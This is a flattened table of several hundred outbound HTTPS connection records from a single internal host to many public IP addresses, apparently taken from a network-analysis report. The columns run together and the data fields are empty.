                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12620192.168.2.135931493.218.237.228443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12621192.168.2.1343678104.72.60.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12622192.168.2.13577621.102.185.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12623192.168.2.13506964.180.161.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12624192.168.2.13371704.178.175.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12625192.168.2.1355162147.10.12.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12626192.168.2.1359546204.86.185.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12627192.168.2.1335926150.169.166.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12628192.168.2.1355794144.28.250.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12629192.168.2.1353826138.58.241.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12630192.168.2.135148869.26.219.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12631192.168.2.1334618121.127.7.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12632192.168.2.1342172132.164.60.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12633192.168.2.1354700109.129.101.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12634192.168.2.133295277.108.148.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12635192.168.2.1333330131.214.125.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12636192.168.2.1359382154.201.126.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12637192.168.2.134496850.253.224.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12638192.168.2.1333180201.78.33.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12639192.168.2.1359632212.233.197.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12640192.168.2.1355472196.138.243.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12641192.168.2.1345816172.96.4.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12642192.168.2.1348160163.170.176.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12643192.168.2.1334568133.216.156.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12644192.168.2.1348318218.40.156.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12645192.168.2.134623093.186.233.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12646192.168.2.1339466161.215.70.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12647192.168.2.134338484.16.63.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12648192.168.2.1360068185.221.60.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12649192.168.2.133506863.243.210.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12650192.168.2.135956812.190.175.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12651192.168.2.134841441.196.228.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12652192.168.2.1350452165.113.232.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12653192.168.2.1350398183.102.51.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12654192.168.2.13369865.214.234.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12655192.168.2.135787479.209.218.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12656192.168.2.1355986107.124.35.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12657192.168.2.1353042132.183.237.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12658192.168.2.134236068.141.167.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12659192.168.2.13374442.79.172.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12660192.168.2.1342040182.245.72.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12661192.168.2.1344932218.254.194.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12662192.168.2.133358464.15.36.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12663192.168.2.134034842.47.241.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12664192.168.2.1355034187.89.188.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12665192.168.2.135507267.226.181.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12666192.168.2.1341708184.164.197.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12667192.168.2.1343472120.177.209.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12668192.168.2.133555899.86.142.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12669192.168.2.134460223.30.21.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12670192.168.2.1354008113.30.112.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12671192.168.2.134505613.7.244.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12672192.168.2.1345798111.195.155.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12673192.168.2.134864879.26.230.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12674192.168.2.1340060136.245.18.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12675192.168.2.135350459.85.154.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12676192.168.2.134748658.100.162.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12677192.168.2.1351824189.26.228.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12678192.168.2.134726890.43.64.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12679192.168.2.1336302210.203.32.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12680192.168.2.134209079.128.170.67443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12681192.168.2.134841297.38.134.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12682192.168.2.135194266.226.128.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12683192.168.2.1340592165.33.5.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12684192.168.2.1343338218.108.208.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12685192.168.2.1349936130.167.113.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12686192.168.2.1354590106.21.158.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12687192.168.2.1348010123.157.158.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12688192.168.2.136029892.50.14.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12689192.168.2.1348150185.125.181.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12690192.168.2.134106270.76.231.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12691192.168.2.1339962187.9.143.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12692192.168.2.1348782155.146.253.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12693192.168.2.135800646.202.143.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12694192.168.2.1339876201.101.10.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12695192.168.2.1341928187.182.179.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12696192.168.2.134166481.105.228.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12697192.168.2.133532481.226.174.182443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12698192.168.2.1345236195.68.15.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12699192.168.2.1335896129.6.135.82443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12700192.168.2.1343878123.183.96.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12701192.168.2.1359910105.47.165.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12702192.168.2.1347184157.121.7.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12703192.168.2.1334770154.104.40.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12704192.168.2.1356550126.116.222.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12705192.168.2.135094683.223.249.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12706192.168.2.1347508204.232.55.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12707192.168.2.1340130135.167.174.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12708192.168.2.1339692197.254.129.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12709192.168.2.133937287.17.5.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12710192.168.2.1360872193.146.101.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12711192.168.2.1360346198.25.29.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12712192.168.2.1345498183.105.178.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12713192.168.2.135921612.245.43.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12714192.168.2.1339740159.37.36.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12715192.168.2.134127240.119.127.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12716192.168.2.1338646139.187.253.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12717192.168.2.134130473.63.252.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12718192.168.2.134518688.207.68.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12719192.168.2.1350026192.148.217.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12720192.168.2.1343768148.215.116.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12721192.168.2.1347994206.39.170.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12722192.168.2.1352576134.248.242.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12723192.168.2.1347058184.57.154.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12724192.168.2.135196087.42.65.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12725192.168.2.1351246177.6.51.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12726192.168.2.1335408201.59.193.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12727192.168.2.134147212.28.116.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12728192.168.2.1354550158.8.134.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12729192.168.2.1357688153.187.131.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12730192.168.2.134794865.195.159.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12731192.168.2.1350344178.149.195.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12732192.168.2.1342926162.239.30.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12733192.168.2.135526217.97.207.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12734192.168.2.1356854131.129.135.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12735192.168.2.1360354175.252.92.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12736192.168.2.1354414171.238.101.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12737192.168.2.1336422123.219.44.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12738192.168.2.1340796162.255.210.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12739192.168.2.135444289.244.107.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12740192.168.2.134686245.134.220.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12741192.168.2.1349868217.50.217.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12742192.168.2.133338254.62.61.77443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12743192.168.2.1335438207.161.2.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12744192.168.2.1353744133.231.118.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12745192.168.2.133506672.231.207.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12746192.168.2.133314876.130.48.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12747192.168.2.1340588222.201.192.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12748192.168.2.1357144200.212.158.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12749192.168.2.1338062139.237.62.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12750192.168.2.1340824193.87.35.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12751192.168.2.1358872190.218.216.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12752192.168.2.135366812.86.236.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12753192.168.2.1359514110.203.190.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12754192.168.2.1339166186.231.191.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12755192.168.2.134764690.253.138.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12756192.168.2.1334902117.23.215.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12757192.168.2.134471293.102.129.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12758192.168.2.133985469.131.156.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12759192.168.2.133321834.234.66.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12760192.168.2.1354244116.94.106.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12761192.168.2.134342487.66.51.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12762192.168.2.134341693.122.117.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12763192.168.2.134430091.110.83.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12764192.168.2.136079666.12.245.18443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12765192.168.2.134750853.238.34.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12766192.168.2.135080897.124.202.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12767192.168.2.1344864197.52.33.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12768192.168.2.134980497.125.182.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12769192.168.2.1358064194.26.34.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12770192.168.2.134633893.127.107.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12771192.168.2.135132696.219.149.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12772192.168.2.13473644.110.27.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12773192.168.2.1343812136.59.108.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12774192.168.2.1344330156.160.228.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12775192.168.2.1351994104.13.141.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12776192.168.2.1360006219.30.88.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12777192.168.2.1333876111.197.62.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12778192.168.2.134220667.186.236.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12779192.168.2.1333696201.6.71.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12780192.168.2.1340018219.197.229.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12781192.168.2.135639694.51.191.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12782192.168.2.135168481.82.172.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12783192.168.2.134379693.101.184.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12784192.168.2.1356026150.246.79.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12785192.168.2.1354882201.32.94.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12786192.168.2.1342682194.67.227.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12787192.168.2.134724843.120.51.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12788192.168.2.134815691.98.79.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12789192.168.2.134527231.206.89.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12790192.168.2.1342852154.191.219.167443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12791192.168.2.135930219.196.196.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12792192.168.2.134724699.58.91.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12793192.168.2.133494465.110.4.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12794192.168.2.134571436.89.151.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12795192.168.2.135695276.247.144.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12796192.168.2.135849268.47.58.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12797192.168.2.1355464164.226.77.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12798192.168.2.1359816102.3.23.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12799192.168.2.1353832154.113.0.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12800192.168.2.1356322161.224.231.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12801192.168.2.1333690170.25.198.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12802192.168.2.135321658.201.224.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12803192.168.2.134811499.120.218.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12804192.168.2.13496721.15.215.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12805192.168.2.13564588.129.239.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12806192.168.2.1337108156.154.112.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12807192.168.2.1345780194.115.245.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12808192.168.2.1350662195.113.245.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12809192.168.2.1337392173.129.212.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12810192.168.2.1347754175.225.53.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12811192.168.2.1353588186.81.77.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12812192.168.2.135354814.226.145.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12813192.168.2.1360386139.74.55.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12814192.168.2.1358902145.201.172.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12815192.168.2.134302014.156.215.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12816192.168.2.1354722101.4.151.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12817192.168.2.133527854.115.165.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12818192.168.2.1338952162.153.194.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12819192.168.2.1353880116.23.26.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12820192.168.2.134431634.207.152.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12821192.168.2.134292438.12.132.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12822192.168.2.1342482178.144.70.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12823192.168.2.134091446.63.73.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12824192.168.2.1340382203.30.31.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12825192.168.2.1341512200.11.0.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12826192.168.2.1339558207.36.103.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12827192.168.2.134900235.210.163.246443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12828192.168.2.135490641.214.205.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12829192.168.2.135739065.72.108.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12830192.168.2.1337962169.231.203.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12831192.168.2.1339872172.48.37.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
